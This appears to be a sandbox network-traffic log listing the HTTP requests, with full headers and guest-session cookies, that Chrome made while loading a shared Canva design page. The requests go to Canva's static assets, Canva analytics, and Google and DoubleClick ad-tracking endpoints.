    Source: global trafficHTTP traffic detected: GET /web/42edacda53f68fee.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=2T%2FHjvwIcR1Yv1KUZyE1XM3g5yHM7Ueg6SXwK98npqpmNPGujqz283%2BH7z3YXCGTaBOYrY6iImyNJB3UfgG0MAfgwR%2By6OkRC1F0AamReO7sX9JXuMFwmDYBaQJ%2FiQ%3D%3D
    Source: global trafficHTTP traffic detected: GET /web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2 HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /activity;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1734643647572&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_17346437651480&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=gtm.init&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&epn.percent_scrolled=90&_et=6&tfd=23024&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=NsGba152%2BSkmEfYI48S23W5P7wqUzR%2BfwwCHvOBEnIR3GO4uWMjjSZr1rI8jdCOhBYCXB7V43N7yfX12CfzICCEMyX%2BurQpgG%2Bwz%2B5hmoLtsUHY%2FtjmM2E3ExmyVDg%3D%3D
    Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission; ar_debug=1
    Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission; ar_debug=1
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102081485~102198178&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQII08WxAiIBAUABSid0cmlnZ2VyO25hdmlnYXRpb24tc291cmNlLCBldmVudC1zb3VyY2ViBAoCAgM&eitems=ChAIgKWPuwYQ_Ivq-YrJqPJ0Eh0ATXZP9OU8PFPS85y3nzydugNohBqZad_yiLkTRA&pscrd=CISYhdiUnbCDeSITCJWwtJnjtIoDFY1EHQkdurMqaTICCAMyAggEMgIIBzICCAgyAggJMgIICjICCAIyAggLMgIIFTICCB8yAggTMgIIEjoWaHR0cHM6Ly93d3cuY2FudmEuY29tLw HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger;navigation-source, event-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission; ar_debug=1
    Source: global trafficHTTP traffic detected: GET /web/ed3781c5c1cc0c75.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
    Source: global trafficHTTP traffic detected: GET /web/a69e6dc612146c74.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1734643647572&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_17346437651480&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=gtm.init&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&epn.percent_scrolled=90&_et=6&tfd=23024&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
    Source: global trafficHTTP traffic detected: GET /ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102081485~102198178&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQII08WxAiIBAUABSid0cmlnZ2VyO25hdmlnYXRpb24tc291cmNlLCBldmVudC1zb3VyY2ViBAoCAgM&pscrd=CISYhdiUnbCDeSITCJWwtJnjtIoDFY1EHQkdurMqaTICCAMyAggEMgIIBzICCAgyAggJMgIICjICCAIyAggLMgIIFTICCB8yAggTMgIIEjoWaHR0cHM6Ly93d3cuY2FudmEuY29tLw&is_vtc=1&cid=CAQSKQCa7L7dDOYJdi02Nb79onvCexLh_XI94ohyYMcbA-T3kydnGjWpfy-F&eitems=ChAIgKWPuwYQ_Ivq-YrJqPJ0Eh0ATXZP9IyHoRVZZJ_JmuzO0lRAjDrS6fHVmpfWwg&random=3727329767 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger;navigation-source, event-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/a69e6dc612146c74.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D
